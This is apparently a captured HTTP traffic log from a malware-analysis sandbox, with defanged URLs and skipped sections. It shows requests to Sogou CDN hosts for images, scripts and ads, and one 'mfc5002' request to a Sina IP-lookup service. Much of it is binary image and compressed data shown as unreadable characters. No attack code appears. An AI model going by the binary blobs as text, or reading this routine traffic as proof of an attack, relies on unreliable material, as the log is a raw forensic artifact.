P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:28 GMT..Content-Type: text/xml..Content-Length: 0..Connection: keep-alive..Set-Cookie: SUV=00DD04B9C18AF4E75371A458B1D10495; expires=Fri, 10-May-24 04:49:28 GMT; domain=.sogou.com; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..
GET /imgn/v51/new-erweima2.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: image/png
Content-Length: 18683
Last-Modified: Mon, 08 Jul 2013 10:16:12 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:28 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...,...,........"..H.IDATx....x.U..'.R.D.Q....*...]A.;".".... 5$.%....I.=....^............?.I\2w.,......'..\....;..s....D......H.!.D..H$..D".I$.AH"..$.. $..B.... ...tuu..lcc..=.....}.6v.....S.wbaa..Dv..[$.|..!.=..9.....d....;......[?w..M..'.l....[.....d.....U.. $..B.. $..B.. $..B.. $..B.. $......AH..!|....t.....:.?......c........gi.....:::.s.p........{^.j.....~X..B1!...g..|.r.9..;W........J......yx>>>.sdB.....T..I.bgm.......~.Mu......V.....j....P4.d.........4n.MEK..1...5.tjjj............O^.h.....F.<..:...!AH....!AH....!AH....!A.~......yE.H.....!Ax..v..d..............j....U....*.%x..{d:.:.B.._vv.........."l..$.......OSS...g....y..'......l......rrr..z.@(..3..T<.].B......!CT.Ph.d.U. ...2....,.p.....@$::Z.........x.T<A<..!AH....!AH....!AH....!AH....!A..!...y.&L...@...c.......j.........(.....,l.k....7z..N.P^....O.....2R.!.qGA(..$.;.Y.........w[...C........l.qI....,!AH....!AH.>x..t.@(..!Te%aGA...".....!..QY..Z....5..d....%$..B.. $..B....N..[o.....^b6.>|.(.._..K?..#s.....6F.@f.....6......w.Q...={V........VVV2/..o.).AOO.y....#?.}l.;Y.V. ...=L._...bqL'..Q*.W..3......J%...(AH....!AH....!AH....!AH....!A.i.".....i....G.yDx.......f.....m.......@.3.d6....pwZZZJ....H.......]]]...N.y...P.ekx.T|P........B.....LK.........X.....~...b......!AH....!AH....!AH....!AH....!AH....6.C....s...*....k......2...7O....Lu.?....,..9Sx..b.tv...P.C.F...c....7..y......6l.6...e6f..|....c(...N~P.F'A.E..A.X..:.(....'T*...@h.p.T..]G.!AH....!AH....!AH....!AH........n..<W.c...c.....&..w1.....{V....;.= .)hjjz
<<
<<< skipped >>>
GET /imgn/sehome/tjv1/img-news.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/gif
Content-Length: 225
Last-Modified: Fri, 11 Jan 2013 08:57:48 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,..........^...dY"I"(...pl...$.0.|..6... .P..c..1....psF..TbZM......M${.S....Dj@.....f.lo...v%.fD...)..#.!.;....
GET /imgn/sehome/tjv1/img-video-2.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/gif
Content-Length: 225
Last-Modified: Wed, 15 May 2013 13:45:48 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,..........^...di....J... .k..O.......cT..t.F.A(...@ ...TN.Tz| .*......R....>..e.<R..A6.....D'..@..')'.#.!.;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:32 GMT..Content-Type: image/gif..Content-Length: 225..Last-Modified: Wed, 15 May 2013 13:45:48 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:32 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a.......................................................................................................!.......,..........^...di....J... .k..O.......cT..t.F.A(...@ ...TN.Tz| .*......R....>..e.<R..A6.....D'..@..')'.#.!.;..
GET /imgu/2014/05/20140508103513_537.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p4.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 21959
Last-Modified: Thu, 08 May 2014 02:35:13 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89ai......SSS.ww........\.......c;/.W...i......C.hhh.R......................................vE.....................-.......Z...bbb~~~.=.....]8....t...."*........dd.......A....S............%..............D..=....DDD.K.....kH.....h...................BB...)1.TZ........$$.SSJJJ.::...qqqdj..........\c..........4<......4vvv.,,.22.ZZ.......j ...................nn......ty.>>>....z\lll..........]#....KK.............qR.L$....f ............:B...x......................R,......yyyCJ............{.....b%-............mh...n7.....r...JQ.....a'.K..~O.6........}`.....c......lq....}............G.....R$.....p.E...b.....m~...V..^ .G...z..s.......vW.}Z.G.....P......~.Z0.............9..............D.@............yU.sM.@...i....77'/..>>.K..F.. ....\s..............XL.....w....,&..f.....h......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:491CD10DA3D5E311A958EE854ABCD7D0" xmpMM:DocumentID="xmp.did:4C40E5B5D5E411E3B4278899C73C6A8E" xmpMM:InstanceID="xmp.iid:4C40E5B4D5E411E3B4278899C73C6A8E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9908CF
<<
<<< skipped >>>
GET /iplookup HTTP/1.1
User-Agent: mfc5002
Host: int.dpool.sina.com.cn
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Tue, 13 May 2014 04:50:09 GMT
Server: Apache
Location: hXXp://int.dpool.sina.com.cn/iplookup/
Cache-Control: max-age=120
Expires: Tue, 13 May 2014 04:52:09 GMT
Content-Length: 246
Connection: close
Content-Type: text/html; charset=iso-8859-1
SINA-LB:aGEuMzguZzEuYngubGIuc2luYW5vZGUuY29t
SINA-TS:OTdjMmRlY2UgMjQwNSAyNDA2IDAgNiAyNwo=
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://int.dpool.sina.com.cn/iplookup/">here</a>.</p>.</body></html>...
GET /imgn/tips/skin_tips_n1.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p8.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 1779
Last-Modified: Wed, 20 Jun 2012 04:23:22 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:26 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89af.!../......Z..R.....K...........P.....Y.....}.........................................^...........S...........l.....W..L........m...........f.........................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068119109DDF35EE18454" xmpMM:DocumentID="xmp.did:B01789E6890511E18530B51A3723DDED" xmpMM:InstanceID="xmp.iid:B01789E5890511E18530B51A3723DDED" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02801174072068119109DDF35EE18454" stRef:documentID="xmp.did:01801174072068119109DDF35EE18454"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-, *)('&%$#"! .................................!...../.,....f.!......pH,...$q.l:...4i.....vK<<...xL.1>..y.... ........k/2...(..........{.........B.$)..........{!......./....................
<<
<<< skipped >>>
GET /imgu/2014/05/20140512170407_319.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p8.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 5937
Last-Modified: Mon, 12 May 2014 09:04:07 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....|.-......d....Qg.u.Vz3......\..lD. .......hN........c.....s....mt....6...X73u.>.'8.v......i>.4w...V.R9..a.G....B.:..Zd..Sf.r%.5(.O........C1..A.:`.}.Z.&.B.OS...i..w...._..........o......u..7RQ. z. *.*...._...m....G..^4...[X......v.T...?&.i-...j.}^.....K.P.V..-...S.'.....,c.%...F...m...............A....Y.G8...WM*..q..,.y.9..../kB.jx...?.xg.w.....l.,.hnmgM.....v.V.]8%s.&.....j\)#..-....p.&9..z..J....e.....~8~..Z/.9...<..|V.K...(. .7x....<.mm..*.G.c..c...)...c.A..k........o...y....^;.|."...42k.u.....s....h.|..pk...I.rIBKV..#...a..u.W..|e...f...V.g...h.]Z...v.i...g'sq....q.y.I{._.}6.(....M.....E.5.-.B...4..........D^T}I. ..V.Yb%.....4.........3]K3.,...l.....C..c..g........w.?..<.....V x#..r.q.@........E..ua0...P..k.S...c......- I.<bMSP.C.......GB{._.c..n6.5...G..2........._..r...*.W.Wg....\.b.P....66...d...c.rJ......#.s.C.....O5....P.
<<
<<< skipped >>>
GET /v53/imgn/guide_tip.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: image/png
Content-Length: 10442
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E388CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E3040A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky......f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<.............i......h-....@_~.. _&.2%...<..........k......w.d./.....U 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.jjj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.
<<
<<< skipped >>>
GET /kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:22 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 27 Aug 2013 08:33:31 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
b9b.............Y.o....=...}mH....yx....vZ.p..q...P,....*I...........#@Lrvvvv.ofW...g......Hx-...... ........UQ.emk kq.CQiA^j'..k..n.2_e....x.kg.o......:....W.:.K[;-..v.'.(A}..8.5.D.....D..<..oW....uaO...-./.8..e*..Q.....H.)&...*.3[.Y3._.....Y%|...R.#..9.n..JJ..f...%..Y...O.Dh....A.id.....*..O7|n,..T.e."......d%...9.fg.e..Z...m..m..L..4O_'..>;<.>...X...*...33N....a.7...?....a....A....J...=M..T./.'.`.y5....8....{.20T.P......M....UKc.g....7.&[..]y.Hyu..^.WyP....].0c...z_?&.}$D=T.v..|.:.Zj'..tV.<f,\......cwU.....93Y.~......4"....O.8....U....!t.l9..e..~.....F..c.:.o...\...Zh....>..kWD..F...D...._%.w...06rs.&V./.&.y..#m.Vy../FS...b..)..g.H.%....n.,..Bs..t[}.........h.....s....B.......~....EFZ.E..z.;...G..'.Y.qV.?....;..%:o...........n.A.....^...y....[R.*.`.......I.3.. .U.x2W.....J..W....B..g..*....5.s.!.^4.. `{^z........h.....e.(Fc=B(..E..p.]c....R.eD...k.A:y...nd..c.Ã..z..Mr..-..:..L....&...W....z:7..d....d.)Gw.x..~5;..qR#..U.7.....H......{...v..)...I..v../....G6....yV....[..Ql....>.|}...a.dnn..f..|fL...'h......*J.'.W.d..(M. W[w8v.0..qY.....w@..d...b_....Z.........s....#!...(c..d...<.........$.....Y...:Z..... ..y..]....K)*.O.q.C=*.$..q.Gf.....*WY.......Z<..c.3.._`LDj....`.jDj..\0....<...xy.xN}..LK.G..5..3....5...|.3CS...,|.6...*.d...X).....Q6.BlQ.A...}....:.W..q......ad8bc.p.......n..;e.<L0 d....w...OG..<D....'..m....3.Q.....K=6.kK..5.....M.3..w.Z......[....#...N\.G$F.!.KS../y.:s......[.).c..h'uc....V`...(...@....../..j...."..C....pB.!.....f.Px.r..[p...R.......b..]u.I%.6|.NAXs.
<<
<<< skipped >>>
GET /imgn/v32/icon4.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:22 GMT
Content-Type: image/gif
Content-Length: 1506
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89a".....................v.....Cs.`}..................................I{.b...........................................................U..m..r..........................M..Z..............................................................................................................................................................................................................mmm^^^QQQ777......!.....~.,....".......~....................................................................dKG8HINi.];K.D.kUMJ[.LG`....DIa.O9c.o|z.bKL.i8p.zy{x..G..OL....'@.>w.Y.....ox..).n..:..(.....oz...........XB.......9.3@.'...........5..H...5....m..HNk...4.... uYR...7.....Rj./J.H..d...p....d....5.(ybi..%<..f....Lk.4Y..M....<I..G..T2.eB%.. I.X..dI..T.R...m.6J.H...M.<?....CR..w~...T...<F?r....v...<.Rk....D.}<..1..<9........y..9t;z..S...B.....mU..1Ga.T.L...B...];..p.t....$r(..Oz...Ou8..$[...[d...%[ 1@M~.0.%T ..`N.....`....5aE}..)...,P..H&YD.%E...[,.@I.f....%.`C...`.......%..B.!x....,9..%. '.jv.A.a......y....)..}.`'..P...t.z(..4..76t.C.Y.P..If....h...=dP...0`*........*...d.@...ZA......)...$.Lq...&.....`@...p.."..A.!..B.S....)D;.....m.1L1A....n$.L...$@...>L....x..$).a(..L.........>B........H.....(..$...A..lp.....B..4...Pp..."D ..&k.r#.....<C...SL1...F....P.4.L7....F-.....@. 4.B...#p....dp...p`..S@1E.?..@%g..A.2....P.....4.@.'.PC.1....P.p.......z.^..!.....H2A....w.&.@.. L.B......&......`...BrC.f@..."....&<.)$u....g.....,.@..L.@..CP;..@ ..3Lr.?.=.`...h....,`v.).....: ...B^...,0...0..R...\b..PA.R`..xbkT
<<
<<< skipped >>>
GET /v53/imgn/v53_2icos.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 2051
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89a)....................8Y....................1..v...........=..............z....................e........J........}.................8..j..............u.................r.....Q..............C.................k...........L.............................................................................................................................................................................!.....N.,....).......NN5....................N.?N...........I.>.=......@..0.........N......-.......................<*........A..G.%:......#%% .C.......].....I!JP.....I..a.8....A$.3..B.H.$N\.a %#.#......I4L)..k...&O........{.(7.fN.:(P.pO.C.!..,.j.....D.'..6.G'A........u-z",..H....q...W.LI]d...J7..8. .O.x.*..l....Tl...... ..m<a.$.J...d..a...J...s$.$H..e..$^..9...D.........[k.`.Jbs.qk..nj..Yt........n...c.......uE'.c..n.Q_b.....)..x....d.....6e..V.)._c..'....W`...._{.}E.$.` ........,.....@..,.....)..W.M ..-....B.8#&..)...y..#..gb.#.|.. K6..*IJ.....R.3U:.%#..Rer_....P.8.9c.X...8..#_..&.jN.'B>..g.$....G...P1..&0.........MTIb. ....M8!.h........*.y`yZ.|.xG.Q6.)k.6.:J_..y.X}....-\..o.05k..L..)...........v.)..HK.H.....J.....4[.c.*Bn..9.^...[.xw.;...bGo......h.{o...[.%..Xo#...^..d S......~..r...*\....._.......@.b..&F...m...9.h..0..".*.(...:.....s..,..2.....!..l.#N.....4y..S32% cr..-bV.,...S.....6.....wn.9&.;LP7..a.wMlVy...W:....0..<. ../.2x{...(%V.[B.PM..TGu.yV.....$z^9v.J".....@.:0EB....:. ...]".PW....`.......PP..p..D.%..|...e..>)al....=.._.%...z..O...n..J.B.........>.....B....62....C.h.k....<@.....B.A...5..
<<
<<< skipped >>>
GET /v53/imgn/v53_arrow_h.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 1036
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89aQ.}..........1..b.......................C.....t.............................G...........j........}..T..................................................................................................!.....).,....Q.}........(....r.l:...0E.Z...v..z...xL.o...z}-..p.;N.W.......&. .z.waZ........z|W.........#.v.W.X!...u.)..Z$.$.q....\...{.U....[...j.....Z..........[....d...\....f...[. .i.).!X..e.....).......]Q0.........%..@$"(.8....t.b..q#.......e...C..\..%..B..|.sK..NPz..E.......8s....T..R.q.SYO9:..u...U?^......k.j.J...Bb..%....H`...jv......i...Z...~.\O.R..*x.B..R...(V..L..]4..<./.5."...q.d.....@ sT........k1..W.R[N...ws....p9.../n....Y.3'C....b*D..8M.........w......PM...N..-.}......b.~....w.}..h....WE}...`...W`9`=.!.U1x.n....\.]h.TU.". ."2.Z..aXF.m<U.s.)7..Z.H..Z...R..H..d...........6b]D...i....^U.x.`P.yW.m.uT..eya.t..#Gf...aj..Q......V..d.^....brE..|..e.y....".D.N>....C...N9E..M..1.I..*....j...r.. ...E".-...ZPb.&.pBk...@J....k.... -.l.....#........0..4.jP.5.\.-...#N.....:..#)@<..k.=.......K.A.....V8..D..,....l... ...;....
GET /ads_hz/_ads_2.js?t=777753 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2014 04:30:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
c11.............Y.s.H..W..=,- $0. ...v.W%.W.l.na.%.H(. z......G/ .....h.=3.....-;y8..(...' .B.e.......d.3*.i&.;Ag.q......tme\V.......py..eKi.....y..L.G....u.......s9P....la...._......_...b/.)H.j.....c.x. ..P...k.......B...."I.E.f....~.$Ul.....`!L#.o6.H.{....\yIx.'.T..an|N..^....[.MOfi.?1e.a..H.............:..y..U1.......Y.X.I..l..I..p.f..L.....v.@y....M.....$5....E.......2.s..V.J_..eh..Q......=..]....W..v*.9&[dY<.....Fn.C.A/~R].....S..q.-..`........Yv...`.{....r.<...~d.&5x.D.hY.(...{...t$....S.{.<..NJ..);mv.{n..'....l3w.......8[..h.#.h%.#!..Z^..|.%.i..^c.k?b........._.../h.v...i.......[.i%.....M...\.(.}/..{...[.N......u84..........v.X.2...^....wGf....#...p...Z....U..i>K.D.: ...0.z...L....l...U......`M.. y.T..m.v..Z.......D..M...&e]F`D..3.yre...V..l..)..L..m...L1...Fy........Z....^]V.l.."@(/ U.\....d...p.R=.sc..;|..s%.....d."......m.....6.d...N...H.~..Ck....jcW.qY..\'v.Uj...0.S.~.R..7.\x.#..;..N.4..m..r..Z{ny...o..a.7)...f.......?..~..:.......c.....J}...z'.%..I.pef...."....{.#......_.......W$%....V.....| |d....y.....Cv...........\..j.b..Z..s..b..u...".....A;%....cZk....8...L.o..V^...V......w0f[...D....P*.s.w...H.W...w'.[...B..#.oe...C.F.*4...RP.....(..)0{.F.x..P.i..)....../.....dLv.\........z....30.9.]f..g..,..~X.8..xf...$.C.9O|.........B..y.....6._m....p..>..O)8 ...!.b...0fL... .o..J......'W5..-.5...*n@.?R..4X..XQf V...Z...Q.PV.E1...E`.........J.}F.....W.ir.6.....\.u........."..(t{...zV...../......x2O...:..|....'...(Q..'....E~..x#...z.(.d..........h...3.....M..I".3 .uZ...U7]._....:....d[.e.#.YX..
<<
<<< skipped >>>
GET /imgn/v32/selogo_111207.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p4.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 12155
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
